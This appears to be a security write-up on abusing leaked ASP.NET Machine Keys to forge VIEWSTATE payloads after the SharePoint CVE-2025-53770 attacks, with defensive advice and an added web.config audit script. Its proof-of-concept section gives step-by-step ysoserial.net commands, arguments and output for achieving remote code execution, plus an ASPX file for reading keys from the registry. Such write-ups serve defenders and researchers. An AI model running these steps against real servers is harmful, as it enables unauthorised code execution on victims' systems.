ViewState - CVE-2025-53770

.NET ViewState

About 10 days after the SharePoint deserialization bugs (CVE-2025-53770/53771) were abused, attackers began dropping ASPX shells that leak the IIS/ASP.NET Machine Keys used to protect VIEWSTATE and cookies. If an attacker obtains a Machine Key (from web.config, or from the registry via an uploaded ASPX file), they can forge valid VIEWSTATE payloads (e.g., via ysoserial.net) to achieve Remote Code Execution across the app. Windows won't rotate autogenerated Machine Keys automatically, so you must regenerate the Machine Key after any code execution. Defenders should also monitor Windows Application Event ID 4009 (VIEWSTATE verification failures) to detect exploitation attempts.

Requirements:

  • VIEWSTATE deserialization (LosFormatter enabled)

  • MachineKey (validation key and optional decryption key)

  • Validation algorithm (e.g., HMACSHA256 / SHA1)

  • Application path / appDomain (used when crafting VIEWSTATE)

  • Delivery capability (send malicious VIEWSTATE to the app — e.g., HTTP POST; or obtain MachineKey via LFI/XXE or by uploading an ASPX to read the registry)
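
A defender-side check for the MachineKey and validation-algorithm requirements above, added here as an example that is not part of the original page or of any tool it mentions: it audits a web.config for keys stored on disk and for weak validation settings. The function names, severity labels and the sample config (with a placeholder key) are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the key below is a placeholder, not a real Machine Key.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="SHA1" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>"""

WEAK_VALIDATION = {"MD5", "SHA1", "3DES"}  # older machineKey/@validation values


def _elements(root, name):
    # Match on the local tag name so a config with an xmlns still parses.
    return [e for e in root.iter() if e.tag.rsplit("}", 1)[-1] == name]


def audit_web_config(xml_text):
    """Return (severity, message) findings; severities are this example's own."""
    root = ET.fromstring(xml_text)
    findings = []
    for mk in _elements(root, "machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            # Anything other than AutoGenerate[,IsolateApps] is a key on disk.
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(("high", f"static {attr} in web.config: readable "
                                 "through any file disclosure, rotate it"))
        alg = mk.get("validation")
        if alg and alg.upper() in WEAK_VALIDATION:
            findings.append(("medium", f"validation={alg}: use HMACSHA256 "
                             "or stronger"))
    for pages in _elements(root, "pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append(("high", "enableViewStateMac=false: disables the "
                             "VIEWSTATE MAC where the runtime honours it"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"[{severity}] {message}")
```

A clean result only covers keys declared in web.config; autogenerated keys held in the registry still have to be regenerated after any code execution, as noted above.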

POC || GTFO

Preface

As there are quite a few requirements, I've created and uploaded the file findMachineKey.aspx to the target ASP.NET web server. The ASPX file reads Machine Keys from the registry as well as from the web.config file, and is used to simulate LFI and/or RCE to achieve the same thing.

NOTE: Since its release, findMachineKey.aspx is being flagged as an exploit and removed by Windows Threat Protection.

To deliver our soon-to-be-made malicious VIEWSTATE payload we need a page that accepts POSTs, so I made this simple web form that echoes your name.

All files used can be found on GitHub.

Exploit

Download ysoserial.net and create your Base64-encoded payload.

PS C:\> [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\a.txt'))
dwBo[truncated]HQA

Generate your malicious VIEWSTATE payload using ysoserial.net.


$ysoArgs = @(
  '-p','ViewState',
  '-g','TextFormattingRunProperties',
  '-c','"powershell -e dwBo[truncated]HQA"',
  '--path','/default.aspx',
  '--apppath','/',
  '--validationalg','HMACSHA256',
  '--validationkey','B298[truncated]173D',
  '--islegacy',
  '--isdebug'
)

PS C:\Users\void\Downloads\ysonet-v1.11> .\ysonet.exe @ysoArgs
Validation Algorithm: HMACSHA256
Validation Key: B298[truncated]173D
simulateTemplateSourceDirectory returns: /
simulateGetTypeName returns: default_aspx
SortKey.KeyData for TemplateSourceDirectory: 7, 53, 1, 1, 1, 1, 0
SortKey.KeyData for GetTypeName: 14, 26, 14, 33, 14, 35, 14, 2, 14, 159, 14, 72, 14, 153, 7, 68, 14, 2, 14, 145, 14, 126, 14, 166, 1, 1, 1, 1, 0
Calculated pageHashCode in int: -905247948
Calculated pageHashCode in uint: 3389719348
Calculated __VIEWSTATEGENERATOR: CA0B0334
%2FwEy6[truncated]WoRI%3D

Send a POST request with the malicious VIEWSTATE payload to the victim and we SHOULD get a 500 Internal Server Error response. This is good: it means that the exploit was successful.

Verify on the server side that the file C:\Windows\Temp\a.txt exists, meaning we got RCE.

